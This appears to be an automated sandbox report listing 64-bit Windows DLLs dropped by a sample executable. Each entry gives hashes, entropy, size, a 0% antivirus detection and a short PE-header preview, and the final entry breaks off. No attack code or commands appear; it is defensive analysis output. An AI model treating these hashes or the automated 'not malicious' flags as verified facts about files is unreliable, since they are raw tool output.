                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...\a.c.........." ..."..... ......P.....................................................`..........................................9.......:..d....`.......P...............p..,....4..............................P3..@............0...............................text...X........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17920
                                                                                                                                                                                                                                                      Entropy (8bit):5.686639072946773
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:CIPHdP3MjeQTh+QAZUUw8lMF6DE1tgj+kf4:CaPcKQT3iw8lfDSej+
                                                                                                                                                                                                                                                      MD5:67E8AB67B5DB0A50AF2AEDEA886EB362
                                                                                                                                                                                                                                                      SHA1:A7D071A3BE454B78A0A0BB100E5D9859C12F98E6
                                                                                                                                                                                                                                                      SHA-256:044B09A6351DB40FE1F242C70942D865CE4CD42A12F24E358F84AE790677D92D
                                                                                                                                                                                                                                                      SHA-512:B2E41422B6642E000D9220A1CF4188B1845A8CF9498338D66CA0DCC0724540694719A4D3EDA017CA6F2F77C3D6A6C427C6C86DB3910C686CECB58A40C5239E2E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...Wa.c.........." ...".*..........P.....................................................`..........................................H.......I..d....p.......`..X...............,....C...............................A..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):21504
                                                                                                                                                                                                                                                      Entropy (8bit):5.904187142846202
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:CGljwG2JaiaqvYHp5RYcARQOj4MSTjqgPm4DwOArwgjxojS:C0jwLJlZYtswvbDwlr1jUS
                                                                                                                                                                                                                                                      MD5:9F6EA560ABD556E1E372137BEAFD630C
                                                                                                                                                                                                                                                      SHA1:E8FBC6AAEFA6A28957486EE024B45C8548EFEFB4
                                                                                                                                                                                                                                                      SHA-256:282B357A06DC7D903B47A26535DCA2D5561007DF3FD2CFE6A1D984E0E9AF991E
                                                                                                                                                                                                                                                      SHA-512:869716AB2501012D1236BE7CDEDED16A62031A409A8FE630D0F7817C1341321205F5B5A1BBB389FEC4661B6BB061552C464895EFCC7E01403BD0FCCED40557F0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...Ya.c.........." ...".6... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text...h5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..,............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):21504
                                                                                                                                                                                                                                                      Entropy (8bit):5.906874026734986
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:CtljwG2JaQaqvYHp5RYcARQOj4MSTjqgPm4Dw8regjxojS:C/jwLJbZYtswvbDw8r7jUS
                                                                                                                                                                                                                                                      MD5:7A573F50BD6942E9BB68307E5B6A0BFF
                                                                                                                                                                                                                                                      SHA1:7E0E435C8589EC3CECFE6354AE9E5AE868B9B209
                                                                                                                                                                                                                                                      SHA-256:C6CD3F23D027FEBDF48161D3B74EDB6C9D4D1BDE23F775990F49572D8EB9DFB9
                                                                                                                                                                                                                                                      SHA-512:9ECD754B99E020A169366CB8C99816070221C4DB2C1EF8C23B6DAC765E6BB56EA3ABBE969025AECEDE8EB6C3EA8C626562F2CDA3C4EA537C5DB1A841F19C2AD5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...Xa.c.........." ...".6... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text...h5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..,............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26624
                                                                                                                                                                                                                                                      Entropy (8bit):5.865358643370569
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:CkDLB9k/jjcui0gel9soFdkO66MlPGXmXcu6DbKjL:fk/Au/FZ6nPxM5DejL
                                                                                                                                                                                                                                                      MD5:FC70E2AF29A514CE21DEB91FA2F21B53
                                                                                                                                                                                                                                                      SHA1:6ED627DD441483ACB43085273FB69D787EB21A2E
                                                                                                                                                                                                                                                      SHA-256:BB0A16A2528A32E933EBE0B3A6EF85693D9D2993880675190633B87DD70B219D
                                                                                                                                                                                                                                                      SHA-512:E1217276B9E7D57EEF9854150E27E0D196CEB9125938BBD0376C7AF48303B3E3F98C41E65A398FF06DC413266208CC6707DBEBD2C6415281B2F6771F9914F627
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...Za.c.........." ...".H..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..,............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26624
                                                                                                                                                                                                                                                      Entropy (8bit):5.9214502299059255
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:CgYLh9avgjrui0gel9soFdkO66MlPGXmXcXrDnMxj:8avWu/FZ6nPxMbDUj
                                                                                                                                                                                                                                                      MD5:51531F4C138871DA66E26AD05176A7F7
                                                                                                                                                                                                                                                      SHA1:73F239AB5FDA66124440FCDADB25089F7DB53747
                                                                                                                                                                                                                                                      SHA-256:EE0E755EBEB1650DDA116EA9CE1A173DD484070377340D277FE0FFC5A02B1838
                                                                                                                                                                                                                                                      SHA-512:888008DD7CEA947C9B7506B9B4608A0E65D5886658A95FD5895EAEEFDF27E55C957FE750E6EC17E4E39FE2786AA2C4BB99B899CB8C1567AB3BB64C07923853CC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...\a.c.........." ...".H..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..,............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12800
                                                                                                                                                                                                                                                      Entropy (8bit):5.022910258326394
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:6RF/1nb2eqCQtkbsAT2fixSrdYDtrymjcqgQvEW:6d2P6bsK4H+DcwgQvEW
                                                                                                                                                                                                                                                      MD5:88E3148D1EB84022E508736D0D488185
                                                                                                                                                                                                                                                      SHA1:4D1D3251CC5E61C7FCF5DC6273E3D7BA301D6CA9
                                                                                                                                                                                                                                                      SHA-256:BA4C1492BB4884F3D77F61A7D23EC9E190EB7DA3A115A271D0954D933264FB71
                                                                                                                                                                                                                                                      SHA-512:25A86C56B84275C2314AD1FD98635B43373977DFC6F2F6737F22B1962A3BB5480539A35DB9FBB70FCA16F5ACB5F19BAB63E1CADA776D1667D07332322F641A5F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&...H...H...H......H..I...H..I...H...I...H..M...H..L...H..K...H...@...H...H...H.......H...J...H.Rich..H.........................PE..d...]a.c.........." ..."............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                                                                                      Entropy (8bit):5.021050571118178
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:HeF/1nb2eqCQtks0iiNqdF4mtPjD0MA5LPYcqgYvEL2x:02P6fFA/4GjDYcgYvEL2x
                                                                                                                                                                                                                                                      MD5:1A3A27F63AFEB42C0282EADA02AC834A
                                                                                                                                                                                                                                                      SHA1:FADDA44628AEF3EC70CC02FC0E43A88C7832F7BC
                                                                                                                                                                                                                                                      SHA-256:E7A7AB2D31AEE3B99773C814114D60EB71107EF862930C582F99313943249163
                                                                                                                                                                                                                                                      SHA-512:0D6D397F87CC5A8A83F1DF20687C967DF4FAF80CF0807AE2B06969E16C107F18A5D39CE34C32C42A53D1726A50860C180266ECAD81B4235F041920F496B25FC7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...]a.c.........." ..."............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15872
                                                                                                                                                                                                                                                      Entropy (8bit):5.2611173941646205
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:CjP2T9FRjRskTdf4YBU7YP5yUYDn1give:CcHlRl57IC8UYDnG
                                                                                                                                                                                                                                                      MD5:3CFA49A173B55891D855BF6D4FEB56C2
                                                                                                                                                                                                                                                      SHA1:2AC09A5F0082B40B4DD801D436DE0391C76A5E6E
                                                                                                                                                                                                                                                      SHA-256:0FAB7DF1E54416434F670EF97ED474FA11C09AA30BED1A8575A09E26DB6DF63C
                                                                                                                                                                                                                                                      SHA-512:AD4B300C8F561A6068946590D53551C93D99D5A728ED87D142B4186CA65C28FE793D343BC09804AB9AEA2B8FAA263F06073BE4231D610390EFD65472C5E7AAC4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...\a.c.........." ...". ... ......P.....................................................`.........................................`9......T:..d....`.......P..p............p..,....3...............................2..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..p....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15360
                                                                                                                                                                                                                                                      Entropy (8bit):5.1302421684233535
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:CHZNGfqDgvUh43G6coX2SSwmPL4V7wTdDll1Y2cqgWjvE:CiFMhuGGF2L4STdDJYWgWjvE
                                                                                                                                                                                                                                                      MD5:ECA16BB6EF78ADF91705ACD412CE4F49
                                                                                                                                                                                                                                                      SHA1:C1FFA8FD2A8898CCF4C923B54C015314DC76B333
                                                                                                                                                                                                                                                      SHA-256:3A22C6E97AD47A8FA33E9B28455CE3E6D72008A9A1800F6489FF5AF752C37F18
                                                                                                                                                                                                                                                      SHA-512:DAC721445E07944266BBFA4E6AE4CB5018FD2E042455D5FA545FA93CB009F3E539BB88FC2FA4CEB758C2AABCA67FCCD2043368F0D9B5B83EBEF35346F9EB7562
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...^a.c.........." ..."..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):35840
                                                                                                                                                                                                                                                      Entropy (8bit):5.847604537982625
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:dxSlYMeNklGS7W5AvQEzRI7V4pMgn0i9yoZrjrq1GS:HSlWNs57uAvQEzR04pMg0WpZrjrq
                                                                                                                                                                                                                                                      MD5:BEEC00F147B53EF8033EB5DF8821AEF0
                                                                                                                                                                                                                                                      SHA1:FF0F5F7C8F168986580C9FFE3B256C966BB0C820
                                                                                                                                                                                                                                                      SHA-256:404EDF6130C709A88B7387F51B6D746BED96230E6C0E670641AFCA799279B504
                                                                                                                                                                                                                                                      SHA-512:678C1E64A7632D8B2628C30578DA227FAFC4D8AE14E020C183FA4AD3B99E2AD45DD695341E7B3196B6E199E68FA5EDABB651757DF34C395A63DB548D770DA649
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..|.../.../.../..Q/.../G....../C....../.../#../G....../G....../G....../....../....../.=/.../....../Rich.../................PE..d...la.c.........." ...".\...2......0.....................................................`..........................................~..d...T...d...............$...............,....s...............................q..@............p..(............................text...XZ.......\.................. ..`.rdata.......p.......`..............@..@.data................t..............@....pdata..$...........................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                                                                                      Entropy (8bit):4.798545931891201
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:lCkCffqPSTMeAk4OeR64ADp6i6RcqgO5vE:lAZMcPeR64ADT63gO5vE
                                                                                                                                                                                                                                                      MD5:DD7D22A0AFE540C07CE9D919CD779203
                                                                                                                                                                                                                                                      SHA1:0E76DB96EC2D9922937A77ABEDB7E61037CC8CB9
                                                                                                                                                                                                                                                      SHA-256:880A4418D81C4DA0D588C0CFD7C68D8C5476385D9203A2D6DED25A0F7B330A76
                                                                                                                                                                                                                                                      SHA-512:BD720CF67E264040F8076EDBB72843305094F1D87BD03A1E9FBEB47564F3963120D76BAD6887FEA560B45958F2FFA929A7D63EA1EC9B633DA23784D98A68C32A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................;..................................................................W.............Rich............................PE..d...ca.c.........." ..."............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):754688
                                                                                                                                                                                                                                                      Entropy (8bit):7.627131782370933
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:wwEuHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6hz:xEuHoxJFf1p34hcrn5Go9yQO6x
                                                                                                                                                                                                                                                      MD5:62A32904910D5550F21C4C4D08993ABE
                                                                                                                                                                                                                                                      SHA1:834FB3919E49439353B62A8B7456E6E5E879EFE0
                                                                                                                                                                                                                                                      SHA-256:3EE17F4004B4EA1DB4D85DB545223AADD6FDD635DF6120A354F6DC605F848B76
                                                                                                                                                                                                                                                      SHA-512:7D45AD10623F297485789DB5BFC153FC8DBC5DB0F1E60D2B244B8B02DACE9A5DD9F947C6EBD7E67739DDCB25569F056FBB131AFB55E817EA6F29112C122FBA1B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$..L$..L$..L-.#L"..Lk.M&..Lo.M'..L$..L...Lk.M(..Lk.M,..Lk.M'..L..M!..L..M%..L..OL%..L..M%..LRich$..L................PE..d...ha.c.........." ...".n..........0.....................................................`.........................................pp..d....q..d...............l...............4...@Z...............................Y..@...............(............................text...hm.......n.................. ..`.rdata..d............r..............@..@.data................j..............@....pdata..l............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):27648
                                                                                                                                                                                                                                                      Entropy (8bit):5.7998007997145695
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:vRwib1zOF2cZT1n0/kyTMIl9bhgIW0mvNah4rzWrxmlPft/wxD6sQsgkbQ0e1J:JLpI2czeM+9dmvNah4uktIxDIkf
                                                                                                                                                                                                                                                      MD5:9E8C8445A0AFCE8FB90F09393D8632A7
                                                                                                                                                                                                                                                      SHA1:F71D027B4064C60BCD6A997E770FBA9F157C907C
                                                                                                                                                                                                                                                      SHA-256:401915CD7832F79187DBE9C1837EF3D2F1C5F274552500A7610453537C3865F5
                                                                                                                                                                                                                                                      SHA-512:E8E7836F1FB28964C1F921EF3FFE42CF43614F52E74BB88458673F216340322B591916FA7FB1E36270CA959A9FAA18AA70C42D5F72B1015BEA8F9198C30BD36E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.o...o...o.......o.......o.......o...o...o.......o.......o.......o.......o.......o....t..o.......o..Rich.o..................PE..d...ja.c.........." ...".F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text....D.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                      Entropy (8bit):6.032199417476561
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:eVoBLZD2Ia9nihf5WeimczTvc/XVTF1bLG4/7MAvQZzS36JM+t:eVoBLZD2Ia9nihf5WFbYXVTFRqaMAvQl
                                                                                                                                                                                                                                                      MD5:6E8F6149B570FD60969FB9183BA87CEB
                                                                                                                                                                                                                                                      SHA1:F7EFA3B00072B00847E63061FE16D9722874DC62
                                                                                                                                                                                                                                                      SHA-256:7C212E351BB27B6E88C9FCCA8315405EE6E3098E88FFB31A2706950E537CA52C
                                                                                                                                                                                                                                                      SHA-512:DF74418FF014AC96CC8C78F964536992E18129B19F17D1EBF4BDDA0E30D168F5F6628D28A0DA1A63F89EEFD1A9BF332360317FE2CF50636834AD1124420F05DA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..|.../.../.../..Q/.../G....../C....../.../#../G....../G....../G....../....../....../.=/.../....../Rich.../................PE..d...ka.c.........." ...".....:......0........................................`............`.............................................h...(...d....@.......0..$............P..,.......................................@............................................text...X........................... ..`.rdata..............................@..@.data...............................@....pdata..$....0......................@..@.rsrc........@......................@..@.reloc..,....P......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                                                                                                      Entropy (8bit):4.48986296849646
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:ypVVdJvbrqTuy/Th/Y0IluLfcC75JiC4cs89EfqADBhDsAbcX6gn/7EC:gVddiTHThQTctdErDDDsicqgn/7
                                                                                                                                                                                                                                                      MD5:F1A2E905085675FC72DE2BA11BF43370
                                                                                                                                                                                                                                                      SHA1:6BA1331FEED29AF133E9FBDA5781CCEC8DC57319
                                                                                                                                                                                                                                                      SHA-256:FAAEA0BFC5EAFA3EBCD625A4F12CCD260D8AF2236D073C86A30C3A1AE38BA141
                                                                                                                                                                                                                                                      SHA-512:1472363871D5C69A5966E32BE8A11C1E3976A5ACC3F5AE51945884514BA4E66FF0C36597152E5A349FB16E66AAC2D4465C1F58EE1322D0712F7AF63875115AFA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&6!.bWO.bWO.bWO.k/..`WO.-+N.`WO.)/N.aWO.bWN.FWO.-+J.iWO.-+K.jWO.-+L.aWO.+G.cWO.+O.cWO.+..cWO.+M.cWO.RichbWO.........PE..d...ia.c.........." ..."............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                      Entropy (8bit):4.73280708403616
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:kDJVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EVAElIijKDQGGbM6YJWJcX6gbW6s:6VddiTHThQTctEEaEDKDKMRWJcqgbW6
                                                                                                                                                                                                                                                      MD5:A9B7C866C5A18CC96570CCA3BE6A2433
                                                                                                                                                                                                                                                      SHA1:4F78C7516E512529B977048BC87ED3A95383B44E
                                                                                                                                                                                                                                                      SHA-256:72998624C023B21F21E449F3268B7E839B248BA55440087CB6B421ED65F9A1B5
                                                                                                                                                                                                                                                      SHA-512:EC890E84384C7B1804CE73B097EF068BADA15ADB5F76E1E9B2BCC54CDE910165A9729F40A1AC18D196DDD3EE4EE60A0CFAA6D56DAAFCAD10630AD2658FAF485B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&6).bWG.bWG.bWG.k/..`WG.-+F.`WG.)/F.aWG.bWF.AWG.-+B.iWG.-+C.jWG.-+D.aWG.+O.cWG.+G.cWG.+..cWG.+E.cWG.RichbWG.........................PE..d...aa.c.........." ..."............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
